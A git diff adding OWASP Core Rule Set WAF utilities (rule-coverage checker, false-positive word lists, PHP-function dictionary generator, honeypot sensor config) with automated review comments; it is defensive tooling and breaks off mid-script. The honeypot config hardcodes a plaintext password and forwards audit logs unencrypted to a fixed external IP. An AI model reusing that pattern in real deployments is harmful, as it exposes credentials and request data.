ignoretests: + max_len = 
len(s['stage']['input']['data']) + max_title = title + print("Longest data: %d in test %s" % (max_len, max_title)) + except: + print("Can't open files in given path!") + print(sys.exc_info()) + sys.exit(1) diff --git a/nginx/config/owasp-crs/util/find-rules-without-test/README.md b/nginx/config/owasp-crs/util/find-rules-without-test/README.md new file mode 100644 index 00000000..faf8ed30 --- /dev/null +++ b/nginx/config/owasp-crs/util/find-rules-without-test/README.md @@ -0,0 +1,36 @@ +# Find the rules without test cases + +This page describes how can you find the rules without any test cases + +## Goal + +The main goal is that we must have at least one regression test for all relevant REQUEST- * rules. (In this context, the PL control rules are not relevant, because they do not need to have tests.) + +You need to pass the CORERULESET_ROOT as argument, eg: +``` +util/find-rules-without-test/find-rules-without-test.py /path/to/coreruleset +``` + +Optionally you can pass the argument `--output=github` or `--output=native`. The last one is the default. + +The script collects all available test files, based on the name of the test files. It will look up under CORERULESET_ROOT/tests/regression/tests/*. + +Then it starts to read all rule files with name "REQUEST-\*", which means this won't handle the RESPONSE-* rules. + +The script parses the rules, uses `msc_pyparser`, reads the rule's id, and tries to find the test case. + +The sctipt ignores the check in case of PL control rules (rules with id under 9XX100), and some hardcoded rules: + * REQUEST-900- + * REQUEST-901- + * REQUEST-905- + * REQUEST-910- + * REQUEST-912. + * REQUEST-949- + + +## Prerequisites + +* Python3 interpreter +* Py-YAML +* msc_pyparser +* CRS rule set diff --git a/nginx/config/owasp-crs/util/find-rules-without-test/find-rules-without-test.py b/nginx/config/owasp-crs/util/find-rules-without-test/find-rules-without-test.py new file mode 100755 index 00000000..6f893bce --- /dev/null 
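Review bot: The bare `except:` around the `os.walk` loop catches everything, including a `KeyError` from a test file that lacks `test_title` or `stages` and even `KeyboardInterrupt`, and reports all of them as "Can't open files in given path!", which points the user at the wrong cause when the real problem is a malformed YAML document. Narrow it to `except (OSError, yaml.YAMLError, KeyError) as e:` and include the file currently being processed in the message, since `sys.exc_info()` alone does not say which file failed. Note also that `len(s['stage']['input']['data'])` counts characters (or list elements, if `data` is written as a list), whereas the README compares the result against `tx.combined_file_sizes`, which is presumably a byte length, so a payload containing multi-byte characters is undercounted; `len(data.encode('utf-8'))` on the string form would be closer, but confirm how the test harness sends `data`. `path = root.split(os.sep)` and `dirs` are unused and can be dropped.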
+++ b/nginx/config/owasp-crs/util/find-rules-without-test/find-rules-without-test.py 
@@ -0,0 +1,137 @@ +#!/usr/bin/env python3 + +# This file helps to find the rules which does not have any test cases. +# +# You just have to pass the CORERULESET_ROOT as argument. +# +# At the end, the script will print the list of rules without any tests. +# +# Please note, that there are some exclusions: +# * only REQUEST-NNN rules are checked +# * there are some hardcoded exlucions: +# * REQUEST-900- +# * REQUEST-901- +# * REQUEST-905- +# * REQUEST-910- +# * REQUEST-912. +# * REQUEST-949- +# +# and the rule 921170 + +import sys +import glob +import msc_pyparser +import argparse + +EXCLUSION_LIST = ["900", "901", "905", "910", "912", "949", "921170"] +oformat = "native" + +def find_ids(s, test_cases): + """ + s: the parsed structure + test_cases: all available test cases + """ + rids = {} + for i in s: + # only SecRule counts + if i['type'] == "SecRule": + for a in i['actions']: + # find the `id` action + if a['act_name'] == "id": + # get the argument of the action + rid = int(a['act_arg']) # int + srid = a['act_arg'] # string + if (rid%1000) >= 100: # skip the PL control rules + # also skip these hardcoded rules + need_check = True + for excl in EXCLUSION_LIST: + if srid[:len(excl)] == excl: + need_check = False + if need_check: + # if there is no test cases, just print it + if rid not in test_cases: + rids[rid] = a['lineno'] + return rids + +def errmsgf(msg): + if oformat == "github": + print("::error file={file},line={line},endLine={endLine},title={title}::{message}".format(**msg)) + else: + print("file={file}, line={line}, endLine={endLine}, title={title}: {message}".format(**msg)) + +if __name__ == "__main__": + + desc = """This script helps to find the rules without test cases. It needs a mandatory +argument where you pass the path to your coreruleset. The tool collects the +tests with name REQUEST-*, but not with RESPONSE-*. Then reads the rule id's, +and check which rule does not have any test. 
Some rules does not need test +case, these are hardcoded as exclusions: 900NNN, 901NNN, 905NNN, 910NNN, +912NNN, 949NNN.""" + + parser = argparse.ArgumentParser(description=desc, formatter_class=argparse.RawTextHelpFormatter) + parser.add_argument("--output", dest="output", help="Output format native[default]|github", required=False) + parser.add_argument('crspath', metavar='/path/to/coreruleset', type=str, + help='Directory path to CRS') + args = parser.parse_args() + + if args.output is not None: + if args.output not in ["native", "github"]: + print("--output can be one of the 'native' or 'github'. Default value is 'native'") + sys.exit(1) + oformat = args.output + + test_cases = {} + # from argument, build the rules path and regression test paths + crspath = args.crspath.rstrip("/") + "/rules/*.conf" + testpath = args.crspath.rstrip("/") + "/tests/regression/tests/*" + retval = 0 + # collect rules + flist = glob.glob(crspath) + flist.sort() + if len(flist) == 0: + print("Can't open files in given path!") + sys.exit(1) + + # collect test cases + tlist = glob.glob(testpath) + tlist.sort() + if len(tlist) == 0: + print("Can't open files in given path (%s)!" 
% (testpath)) + sys.exit(1) + # find the yaml files with name REQUEST at the begin + # collect them in a dictionary + for t in tlist: + tname = t.split("/")[-1] + if tname[:7] == "REQUEST": + testlist = glob.glob(t + "/*.yaml") + testlist.sort() + for tc in testlist: + tcname = tc.split("/")[-1].split(".")[0] + test_cases[int(tcname)] = 1 + + # iterate the rule files + for f in flist: + fname = f.split("/")[-1] + if fname[:7] == "REQUEST": + try: + with open(f, 'r') as inputfile: + data = inputfile.read() + except: + print("Can't open file: %s" % f) + print(sys.exc_info()) + sys.exit(1) + + try: + # make a structure + mparser = msc_pyparser.MSCParser() + mparser.parser.parse(data) + # add the parsed structure to a function, which finds the 'id'-s, + # and the collected test cases + rids = find_ids(mparser.configlines, test_cases) + for k in rids.keys(): + errmsgf({'file': f, 'line': rids[k], 'endLine': rids[k], 'title': "Test file missing", 'message': ("rule %d does not have any regression test" % k)}) + except: + print("Can't parse config file: %s" % (f)) + print(sys.exc_info()[1]) + sys.exit(1) + sys.exit(retval) diff --git a/nginx/config/owasp-crs/util/find-rules-without-test/requirements.txt b/nginx/config/owasp-crs/util/find-rules-without-test/requirements.txt new file mode 100644 index 00000000..a9894876 --- /dev/null +++ b/nginx/config/owasp-crs/util/find-rules-without-test/requirements.txt @@ -0,0 +1 @@ +msc-pyparser>=1.2.1 diff --git a/nginx/config/owasp-crs/util/fp-finder/english-extended.txt b/nginx/config/owasp-crs/util/fp-finder/english-extended.txt new file mode 100644 index 00000000..8a3c41b4 --- /dev/null +++ b/nginx/config/owasp-crs/util/fp-finder/english-extended.txt @@ -0,0 +1,31 @@ +basename +checkdate +chroot +config +crypto +dir +exp +file_exists +fileatime +filectime +filegroup +fileinode +filemtime +fileowner +fileperms +filesize +filetype +idate +is_a +md5 +misc +ord +popen +prev +stat +substr +symlink +syslog +ucfirst +unlink +unset 
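Review bot: `retval` is initialised to 0 and never changed, so `sys.exit(retval)` returns success even when the script has printed rules without tests; with `--output=github` that yields `::error` annotations but a passing CI step. Set `retval = 1` inside the `for k in rids.keys():` loop so the missing-test condition is reflected in the exit status. The two bare `except:` clauses around the file read and the parse also swallow `KeyboardInterrupt` and `SystemExit`; `except Exception as e:` covers the failures they actually report. The `EXCLUSION_LIST` comparison `srid[:len(excl)] == excl` is a prefix match, which is what the header comment describes for `900`…`949` but means the `"921170"` entry excludes exactly one id; a comment on `EXCLUSION_LIST` saying "matched as id prefix" would make that intent explicit.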
diff --git a/nginx/config/owasp-crs/util/fp-finder/spell.sh b/nginx/config/owasp-crs/util/fp-finder/spell.sh new file mode 100755 index 00000000..2e5dde3d --- /dev/null +++ b/nginx/config/owasp-crs/util/fp-finder/spell.sh 
@@ -0,0 +1,163 @@ +#!/bin/bash + +# This program uses WordNet to find English words. The WordNet license: + +# WordNet Release 3.0 This software and database is being provided to you, +# the LICENSEE, by Princeton University under the following license. +# By obtaining, using and/or copying this software and database, you agree that you have read, +# understood, and will comply with these terms and conditions.: Permission to use, copy, +# modify and distribute this software and database and its documentation for any purpose and +# without fee or royalty is hereby granted, provided that you agree to comply with +# the following copyright notice and statements, including the disclaimer, and that the same +# appear on ALL copies of the software, database and documentation, including modifications +# that you make for internal use or for distribution. +# WordNet 3.0 Copyright 2006 by Princeton University. +# All rights reserved. +# THIS SOFTWARE AND DATABASE IS PROVIDED "AS IS" AND PRINCETON UNIVERSITY MAKES NO REPRESENTATIONS +# OR WARRANTIES, EXPRESS OR IMPLIED. BY WAY OF EXAMPLE, BUT NOT LIMITATION, PRINCETON UNIVERSITY +# MAKES NO REPRESENTATIONS OR WARRANTIES OF MERCHANT- ABILITY OR FITNESS FOR ANY PARTICULAR PURPOSE +# OR THAT THE USE OF THE LICENSED SOFTWARE, DATABASE OR DOCUMENTATION WILL NOT INFRINGE ANY THIRD +# PARTY PATENTS, COPYRIGHTS, TRADEMARKS OR OTHER RIGHTS. +# The name of Princeton University or Princeton may not be used in advertising or publicity +# pertaining to distribution of the software and/or database. Title to copyright in this +# software, database and any associated documentation shall at all times remain with +# Princeton University and LICENSEE agrees to preserve same. + +if ! 
command -v wn > /dev/null 2>&1; then + cat < checking ${datafile_name}" + fi + + local datafile="${1}" + local datafile_name + + if [ "${1}" = "-" ]; then + datafile="/dev/stdin" + datafile_name="stdin" + else + datafile_name="${datafile##*/}" + fi + + local datafile="${1}" + local datafile_name + + if [ "${1}" = "-" ]; then + datafile="/dev/stdin" + datafile_name="stdin" + else + datafile_name="${datafile##*/}" + fi + + while read -r word; do + # wordnet exit code is equal to number of search results + if [ -n "${SUFFIX}" ]; then + word="$(sed -E "s/(.*)${SUFFIX}/\1/" <<<"${word}")" + fi + if ! grep -qE '^[A-Za-z]+$' <<<"${word}"; then + continue + fi + + if ! wn "${word}" >/dev/null 2>&1; then + if ! ${MACHINE_READABLE}; then + printf " \`- found English word via wn: " + fi + echo "${word}" + else + if ${USE_EXTENDED}; then + # shellcheck disable=SC2046 + if [ $(grep -c -E "^$word$" "$EXTENDED_WORDS_LIST_PATH") -ne 0 ]; then + if ! ${MACHINE_READABLE}; then + printf " \`- found English word via extended list: " + fi + echo "${word}" + fi + fi + fi + done <<<"$(sort "${datafile}" | uniq)" + + if ! 
${MACHINE_READABLE}; then + echo "" + fi +} + +usage() { + cat < /dev/null && pwd ) +EXTENDED_WORDS_LIST_PATH="${SCRIPT_DIR}/english-extended.txt" +RULES_DIR="${SCRIPT_DIR}/../../rules/" + +MACHINE_READABLE=false +USE_EXTENDED=false + +POSITIONAL_ARGS=() +while [[ $# -gt 0 ]]; do + # shellcheck disable=SC2221,SC2222 + case $1 in + -m|--machine) + MACHINE_READABLE=true + shift + ;; + -e|--extended) + USE_EXTENDED=true + shift + ;; + -s|--suffix) + shift + SUFFIX="${1}" + shift + ;; + -h|--help) + usage + exit 1 + ;; + -*|--*) + if [ $# -eq 1 ]; then + POSITIONAL_ARGS+=("$1") # save positional arg + shift # past argument + else + echo "Unknown option $1" + usage + exit 1 + fi + ;; + *) + POSITIONAL_ARGS+=("$1") # save positional arg + shift + ;; + esac +done + +set -- "${POSITIONAL_ARGS[@]}" # restore positional parameters + + +if [ -n "${1}" ]; then + check "${1}" +else + for datafile in "${RULES_DIR}"*.data; do + check "${datafile}" + done +fi diff --git a/nginx/config/owasp-crs/util/geo-location/README b/nginx/config/owasp-crs/util/geo-location/README new file mode 100644 index 00000000..b9018fb9 --- /dev/null +++ b/nginx/config/owasp-crs/util/geo-location/README @@ -0,0 +1,5 @@ +License +The GeoLite databases are distributed under the Creative Commons Attribution-ShareAlike 3.0 Unported License. The attribution requirement may be met by including the following in all advertising and documentation mentioning features of or use of this database: + +This product includes GeoLite data created by MaxMind, available from + http://www.maxmind.com. diff --git a/nginx/config/owasp-crs/util/honeypot-sensor/README.md b/nginx/config/owasp-crs/util/honeypot-sensor/README.md new file mode 100644 index 00000000..66fc6af9 --- /dev/null +++ b/nginx/config/owasp-crs/util/honeypot-sensor/README.md 
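Review bot: Inside `check()` the block declaring `local datafile` / `local datafile_name` and mapping `-` to `/dev/stdin` appears twice, and the first copy is preceded by a status `printf` that reads `${datafile_name}` before it is assigned; if that is not an artefact of the collapsed rendering, the duplicate should be dropped and the status line moved after the assignment. The per-word loop only reaches `sed`, `wn` and `grep` after `grep -qE '^[A-Za-z]+$'` has passed, so interpolating `${word}` into patterns is safe, but `[ $(grep -c -E "^$word$" "$EXTENDED_WORDS_LIST_PATH") -ne 0 ]` is clearer and shellcheck-clean as `grep -qx "${word}" "${EXTENDED_WORDS_LIST_PATH}"`. `${SUFFIX}` is spliced unescaped into the `sed -E` expression; it comes from the operator's `-s` flag so that is acceptable, but a comment like `# SUFFIX is interpreted as an extended regex, not a literal string` would save the next reader a surprise. The `usage()` heredoc and the `wn` availability check lost their bodies in this rendering and could not be reviewed.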
@@ -0,0 +1,14 @@
+The purpose of these files is to turn your current ModSecurity host into
+a pseudo-honeypot sensor by doing the following:
+
+1. Instructs Apache to listen for traffic on multiple unused ports
+ - 8000
+ - 8080
+ - 8888
+2. Creates Apache virtual host containers to bind to these ports.
+3. If any traffic is received on these ports, then ModSecurity will
+ inspect the traffic by inheriting any rules specified in the main
+ Apache configuration.
+4. ModSecurity's Audit Engine will use the mlogc program to forward
+ the audit log entry onto the ModSecurity Project's central logging
+ server.
diff --git a/nginx/config/owasp-crs/util/honeypot-sensor/mlogc-honeypot-sensor.conf b/nginx/config/owasp-crs/util/honeypot-sensor/mlogc-honeypot-sensor.conf
new file mode 100644
index 00000000..b4afad14
--- /dev/null
+++ b/nginx/config/owasp-crs/util/honeypot-sensor/mlogc-honeypot-sensor.conf
@@ -0,0 +1,97 @@ +########################################################################## +# Required configuration +# At a minimum, the items in this section will need to be adjusted to +# fit your environment. The remaining options are optional. +########################################################################## + +# Points to the root of the installation. All relative +# paths will be resolved with the help of this path. +CollectorRoot "/var/log/mlogc" + +# ModSecurity Console receiving URI. You can change the host +# and the port parts but leave everything else as is. +ConsoleURI "http://204.13.200.239/rpc/auditLogReceiver" + +# Sensor credentials +SensorUsername "honeypot-sensor" +SensorPassword "test1234" + +# Base directory where the audit logs are stored. This can be specified +# as a path relative to the CollectorRoot, or a full path. +LogStorageDir "data" + +# Transaction log will contain the information on all log collector +# activities that happen between checkpoints. The transaction log +# is used to recover data in case of a crash (or if Apache kills +# the process). +TransactionLog "mlogc-transaction.log" + +# The file where the pending audit log entry data is kept. This file +# is updated on every checkpoint. +QueuePath "mlogc-queue.log" + +# The location of the error log. +ErrorLog "mlogc-error.log" + +# The location of the lock file. +LockFile "mlogc.lck" + +# Keep audit log entries after sending? (0=false 1=true) +# NOTE: This is required to be set in SecAuditLog mlogc config if you +# are going to use a secondary console via SecAuditLog2. +KeepEntries 0 + + +########################################################################## +# Optional configuration +########################################################################## + +# The error log level controls how much detail there +# will be in the error log. 
The levels are as follows: +# 0 - NONE +# 1 - ERROR +# 2 - WARNING +# 3 - NOTICE +# 4 - DEBUG +# 5 - DEBUG2 +# +ErrorLogLevel 3 + +# How many concurrent connections to the server +# are we allowed to open at the same time? Log collector uses +# multiple connections in order to speed up audit log transfer. +# This is especially needed when the communication takes place +# over a slow link (e.g. not over a LAN). +MaxConnections 10 + +# How many requests a worker will process before recycling itself. +# This is to help prevent problems due to any memory leaks that may +# exists. If this is set to 0, then no maximum is imposed. The default +# is 1000 requests per worker (the number of workers is controlled by the +# MaxConnections limit). +MaxWorkerRequests 1000 + +# The time each connection will sit idle before being reused, +# in milliseconds. Increase if you don't want ModSecurity Console +# to be hit with too many log collector requests. +TransactionDelay 50 + +# The time to wait before initialization on startup in milliseconds. +# Increase if mlogc is starting faster then termination when the +# sensor is reloaded. +StartupDelay 5000 + +# How often is the pending audit log entry data going to be written +# to a file. The default is 15 seconds. +CheckpointInterval 15 + +# If the server fails all threads will back down until the +# problem is sorted. The management thread will periodically +# launch a thread to test the server. The default is to test +# once in 60 seconds. +ServerErrorTimeout 60 + +# The following two parameters are not used yet, but +# reserved for future expansion. +# KeepAlive 150 +# KeepAliveTimeout 300 diff --git a/nginx/config/owasp-crs/util/honeypot-sensor/modsecurity_crs_10_honeypot.conf b/nginx/config/owasp-crs/util/honeypot-sensor/modsecurity_crs_10_honeypot.conf new file mode 100644 index 00000000..7002bb76 --- /dev/null +++ b/nginx/config/owasp-crs/util/honeypot-sensor/modsecurity_crs_10_honeypot.conf 
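Review bot: `SensorUsername "honeypot-sensor"` / `SensorPassword "test1234"` are credentials committed in clear, and `ConsoleURI` is a plain `http://` URL to a hardcoded IP, so a host that actually ran this file would forward its full ModSecurity audit log entries unencrypted to a third-party collector. mlogc is an Apache-era companion tool that the nginx connector does not invoke, so within this repo the file is inert, but it lives in the config tree that is copied into the nginx image. If it is kept for reference, prefix it with `# Upstream CRS honeypot example - not used by nginx; credentials and endpoint are upstream placeholders` and consider excluding `util/` from the deployed tree; if it were ever activated, the password should come from a secret store and the collector should be reached over TLS.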
@@ -0,0 +1,30 @@ +# +# Add in honeypot ports. +# - These are common proxy ports used by attackers +# - All traffic accepted on these ports are suspicious. +# +Listen 8000 +Listen 8080 +Listen 8888 + +# +# Create basic virtual host containers that will forward all traffic received +# to the official ModSecurity Project honeypot logging host. +# +# - You should adjust the Document root location to an empty directory on your server +# - Also adjust the path to your local ModSecurity mlogc program and for the +# mlogc-honeypot-sensor.conf file. +# - Make sure you main SecAuditLogType is set to concurrent mode. +# + +ServerName www.example1.com +DocumentRoot "/usr/local/apache/honeypot-htdocs" + + Options none + AllowOverride None + Order allow,deny + Allow from all + +SecAuditEngine On +SecAuditLog "|/usr/local/apache/bin/mlogc /usr/local/apache/conf/mlogc-honeypot-sensor.conf" + diff --git a/nginx/config/owasp-crs/util/id-range b/nginx/config/owasp-crs/util/id-range new file mode 100644 index 00000000..a58cf06e --- /dev/null +++ b/nginx/config/owasp-crs/util/id-range @@ -0,0 +1,2 @@ +900000-2999999 +2000000-299999 diff --git a/nginx/config/owasp-crs/util/join-multiline-rules/join.py b/nginx/config/owasp-crs/util/join-multiline-rules/join.py new file mode 100755 index 00000000..7a2fc4ce --- /dev/null +++ b/nginx/config/owasp-crs/util/join-multiline-rules/join.py 
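Review bot: This is an Apache httpd fragment (`Listen`, `DocumentRoot`, `Order allow,deny`, and a `SecAuditLog` piped into `mlogc`), which the nginx ModSecurity connector cannot load, and its `<VirtualHost>`/`<Directory>` container tags appear to have been stripped by the diff rendering, so the committed file may not even match what upstream ships. If it were ever included by mistake it would open three extra listeners (8000, 8080, 8888) and pipe every request on them to an external collector. Recommend dropping `util/honeypot-sensor` from the deployed config tree, or at minimum adding `# Apache-only upstream example; not loaded by nginx` at the top so nobody copies directives out of it.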
@@ -0,0 +1,47 @@ +#!/usr/bin/env python +# +# This script reads all the rule files passed on the command line, +# and outputs them, with each (multi-line) directive joined as a +# single line. +# +# This can be used to work around a bug in Apache < 2.4.11 in +# parsing long configuration directives. +# +# Usage: +# +# util/join-multiline-rules/join.py rules/*.conf > rules/rules.conf.joined +# +# This produces a single 'rules.conf.joined' file that can be included +# in buggy Apache versions. It is recommended to keep this file in the +# rules/ directory (because it refers to .data files in that directory) +# but give it a name not ending in .conf (so the file will not be +# included in *.conf and you can re-run the command multiple times +# without including its own output). +# +# Example: +# +# SecRule &TX:BLOCKING_PARANOIA_LEVEL "@eq 0" \ +# "id:901120,\ +# phase:1,\ +# pass,\ +# nolog,\ +# setvar:tx.blocking_paranoia_level=1" +# +# will be outputted as: +# +# SecRule &TX:BLOCKING_PARANOIA_LEVEL "@eq 0" "id:901120,phase:1,pass,nolog,setvar:tx.blocking_paranoia_level=1" +# + +import fileinput, sys + +for line in fileinput.input(): + line = line.strip() + if line == '': + sys.stdout.write("\n") + continue + + if line[-1] == '\\': + sys.stdout.write(line[0:-1]) + else: + sys.stdout.write(line) + sys.stdout.write("\n") diff --git a/nginx/config/owasp-crs/util/php-dictionary-gen/php-dictionary-creator.sh b/nginx/config/owasp-crs/util/php-dictionary-gen/php-dictionary-creator.sh new file mode 100755 index 00000000..dcb0c55e --- /dev/null +++ b/nginx/config/owasp-crs/util/php-dictionary-gen/php-dictionary-creator.sh 
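Review bot: The shebang `#!/usr/bin/env python` resolves to nothing on current Debian/Ubuntu base images where only `python3` is installed, so the script fails before it starts; the body is already Python-3 clean, so `#!/usr/bin/env python3` is the safe choice. Separately, `line.strip()` followed by `line[-1] == '\\'` also treats a comment line ending in a backslash as a continuation and glues the following line onto it, which silently turns the next directive into comment text; whether that mirrors Apache's own handling of trailing backslashes in comments should be confirmed, and a one-line comment stating the decision either way (`# comment lines are joined too, matching httpd's continuation rule` or the opposite) would document it.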
@@ -0,0 +1,501 @@ +#!/bin/bash +# +# This is a utility script to create wordlists for later use by the +# OWASP ModSecurity Core Rule Set. +# +# The scripts extracts function names out of the PHP source code and +# filters them into different categories. +# + +IFS=$'\n\t' + +# -------------------------------------------------- +# Initialization +# -------------------------------------------------- + +VERBOSE=0 +ERROR=0 + +MYDATE=$(date +"%Y-%m-%d") +MYDATE_SECONDS=$(date +"%s") + +AGE_LIMIT=30 +FREQUENCY_LIMIT=90000 + +RULES="933150 933151 933161" +RULES_CMDLINE="" + +PHP_REPO="" +PHP_REPO_CMDLINE="" +PHP_REPO_GITHUB="https://github.com/php/php-src" + +SPELL_PATH="../fp-finder/spell.sh" +SPELL_PATH_CMDLINE="" + + +DEFAULT_PHP_FUNCTIONS_FREQUENCIES="./frequencylist.txt" +TMP_PHP_FUNCTIONS_FREQUENCIES_ERRORS=$(mktemp) +PHP_FUNCTIONS_FREQUENCIES_CMDLINE="" + +TMP_PHP_FUNCTIONS=$(mktemp) +TMP_ENGLISH_WORDS=$(mktemp) +TMP_PHP_FUNCTIONS_FREQUENT=$(mktemp) +TMP_PHP_FUNCTIONS_RARE=$(mktemp) +TMPDIR=$(mktemp -d) + +trap 'rm -rf $TMP_PHP_FUNCTIONS $TMP_PHP_FUNCTIONS_FREQUENT $TMP_PHP_FUNCTIONS_RARE $TMP_ENGLISH_WORDS $TMPDIR' INT TERM EXIT + +HIGH_RISK_FUNCTIONS_FILENAME="php-high-risk-functions.txt" + +R933160_FILENAME="933160.ra" +R933161_FILENAME="933161.ra" + +read -r -d '' TOOLCHAIN_PREFIX << 'EOF' +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regex_assembly/. +EOF + +read -r -d '' R933161_PREFIX << 'EOF' +##!+ i +##!^ \b +##!$ (?:\s|/\*.*\*/|#.*|//.*)*\(.*\) +EOF + +PHP_DICTIONARY_GEN_PREFIX="##! 
File autogenerated by util/php-dictionary-gen with:" + +R933150_FILENAME="php-function-names-933150.data" +R933151_FILENAME="php-function-names-933151.data" + +DATA_FILE_PATH="../../rules/" +RA_FILE_PATH="../../regex-assembly/" + +# -------------------------------------------------- +# Library Functions +# -------------------------------------------------- + +function usage { + + cat << EOF + +This is a utility script to create wordlists for later use by the +OWASP ModSecurity Core Rule Set. + +Usage: + +$> $(basename "$0") [options] + +Options: + + -a --agelimit STR Age in days before frequency is retrieved anew from github + Only makes sense when used together with frequencylist + Default: $AGE_LIMIT + -h --help Print help text and exit. + -f --frequencylist STR File with frequencies of PHP function usage on github + Default: $DEFAULT_PHP_FUNCTIONS_FREQUENCIES + -F --frequencylimit STR Minimum number of occurrences in GitHub repo to qualify for base rule + Functions not meeting this limit will be added to stricter sibling + Default: $FREQUENCY_LIMIT + -p --phprepo STR Path to PHP repository. Optional. + -r --rules STR Space separated list of rules to cover. + Rules available: + * 933150 + * 933151 + * 933161 + Default: "$RULES" + -s --spell STR Path of spell.sh script. + Default: $SPELL_PATH + -v --verbose Verbose output + + +Filter Architecture +------------------- +See discussion at +https://github.com/coreruleset/coreruleset/pull/3228#issuecomment-1594813466 + +Input: Function list out of PHP source code + +Filter 1: Is the function name an English word? +If yes: Add to source for rule 933161 +If no: Continue +Filter 2: Is the function name frequently used on GitHub (across all PHP repos)? +If yes: Add to word list for 933150 +If no: Add to word list for 933151 + +Please note that rules 933150 and 933151 are parallel match rules. So the +output of this script is the parallel match file for these rules. 
+ +Rule 933161 is a regular expression rule, though, so the output of this +script is the source file for the CRS toolchain. + +EOF + + exit 0 +} + +function break_on_error { + if [ "$1" -ne 0 ]; then + echo + if [ -n "$2" ]; then + echo -e "$2" + fi + echo "FAILED. This is fatal. Aborting" + exit 1 + fi +} + + +function get_frequency { + NUM="" + N=0 + + until [ -n "$NUM" ] || [ $N -gt 4 ]; do + N=$((N + 1)) + + CURL_OUTPUT=$(curl -v \ + --header "X-GitHub-Api-Version: 2022-11-28" \ + --header "Accept: application/vnd.github+json" \ + --header "Authorization: Bearer $GITHUB_TOKEN" \ + "https://api.github.com/search/code?q=$1+language:php&type=Code&per_page=1" 2>&1) + + NUM=$(echo "$CURL_OUTPUT" | grep "total_count" | grep -o -E "[0-9]*") + + if [ -z "$NUM" ]; then + >&2 echo -n " Curl call for $1 failed." + if [ "$(echo "$CURL_OUTPUT" | grep -c "x-ratelimit-remaining: 0")" -eq 1 ]; then + >&2 echo -n " Hitted rate limit. Waiting..." + # 50 is the number of seconds to wait for the rate limit to be reset to 10 + # /search/code endpoint is limited to 10 requests per minute. + # See https://docs.github.com/en/rest/search/search?apiVersion=2022-11-28#search-code + sleep 25 + fi + >&2 echo " Trying again ($N)." 
+ fi + + sleep 1 + done + if [ -z "$NUM" ]; then + echo "- $1" >> "$TMP_PHP_FUNCTIONS_FREQUENCIES_ERRORS" + fi + echo "$NUM" +} + + +function vprint { + + if [ $VERBOSE -eq 1 ]; then + echo -e "$1" + fi +} + +# -------------------------------------------------- +# Parameter reading and checking +# -------------------------------------------------- + +while true +do + if [ -n "${1-}" ]; then + ARG="${1-}" + FIRSTCHAR="$(echo "$ARG " | cut -b1)" + # The space after $ARG makes sure CLI option "-e" (an echo option) is also accepted + if [ "$FIRSTCHAR" == "-" ]; then + case $1 in + -h) usage; exit;; + --help) usage; exit;; + -a) export AGE_LIMIT_CMDLINE="${2-}"; shift;; + --agelimit) export AGE_LIMIT_CMDLINE="${2-}"; shift;; + -f) export PHP_FUNCTIONS_FREQUENCIES_CMDLINE="${2-}"; shift;; + --frequencylist) export PHP_FUNCTIONS_FREQUENCIES_CMDLINE="${2-}"; shift;; + -F) export FREQUENCY_LIMIT_CMDLINE="${2-}"; shift;; + --frequencylimit) export FREQUENCY_LIMIT_CMDLINE="${2-}"; shift;; + -p) export PHP_REPO_CMDLINE="${2-}"; shift;; + --phprepo) export PHP_REPO_CMDLINE="${2-}"; shift;; + -r) export RULES_CMDLINE="${2-}"; shift;; + --rules) export RULES_CMDLINE="${2-}"; shift;; + -s) export SPELL_PATH_CMDLINE="${2-}"; shift;; + --spell) export SPELL_PATH_CMDLINE="${2-}"; shift;; + -v) export VERBOSE=1;; + --verbose) export VERBOSE=1;; + *) echo "Unknown option $1. This is fatal. Aborting."; exit 1;; + esac + if [ -n "${1-}" ]; then + shift + fi + else + break + fi + else + break + fi +done + +if [ -n "$PHP_FUNCTIONS_FREQUENCIES_CMDLINE" ]; then + if [ ! -f "$PHP_FUNCTIONS_FREQUENCIES_CMDLINE" ]; then + echo "$PHP_FUNCTIONS_FREQUENCIES_CMDLINE is not existing. This is fatal. Aborting." + exit 1 + else + PHP_FUNCTIONS_FREQUENCIES=$PHP_FUNCTIONS_FREQUENCIES_CMDLINE + echo "Setting custom frequency list file: $PHP_FUNCTIONS_FREQUENCIES." 
+ fi +else + PHP_FUNCTIONS_FREQUENCIES=$DEFAULT_PHP_FUNCTIONS_FREQUENCIES + echo "Setting default frequency list file: $PHP_FUNCTIONS_FREQUENCIES." +fi + + +if [ -n "$PHP_REPO_CMDLINE" ]; then + if [ -d "$PHP_REPO_CMDLINE" ]; then + PHP_REPO="$PHP_REPO_CMDLINE" + else + echo "Path to PHP repository passed on command line is not existing. This is fatal. Aborting." + exit 1 + fi +fi + +if [ -n "$AGE_LIMIT_CMDLINE" ]; then + AGE_LIMIT="$AGE_LIMIT_CMDLINE" +fi + +if [ -n "$FREQUENCY_LIMIT_CMDLINE" ]; then + FREQUENCY_LIMIT="$FREQUENCY_LIMIT_CMDLINE" +fi + +# Adding parameters used by this run to the prefix that will be printed on the generated files. +PHP_DICTIONARY_GEN_PREFIX="$PHP_DICTIONARY_GEN_PREFIX -a $AGE_LIMIT -F $FREQUENCY_LIMIT -s $SPELL_PATH" + +if [ -n "$RULES_CMDLINE" ]; then + # Making sure the rules given on the cmd line can be accomodated for. + echo "$RULES_CMDLINE" | tr " " "\n" | while read -r RULE; do + echo "$RULE" | grep -E -q "^(933150|933151|933161)$" + if [ $? -ne 0 ]; then + echo "Rule $RULE is not available. This is fatal. Aborting." + exit + fi + done +fi + +if [ -n "$SPELL_PATH_CMDLINE" ]; then + if [ ! -x "$SPELL_PATH_CMDLINE" ]; then + echo "$SPELL_PATH_CMDLINE is not existing or is not executable. This is fatal. Aborting." + exit 1 + else + SPELL_PATH=$SPELL_PATH_CMDLINE + fi +fi + +# check if WordNet (wn) is installed +# We could also defer this test to spell.sh. But if done ourselves, we can +# control the error message and behavior. +if [ "$(command -v wn > /dev/null 2>&1 )" ]; then + cat </dev/null 2>&1 + ERROR=$(($ERROR|$?)) # logical OR + break_on_error $ERROR + echo "done" + PHP_REPO="$TMPDIR" +else + echo -n "Updating PHP repo ... 
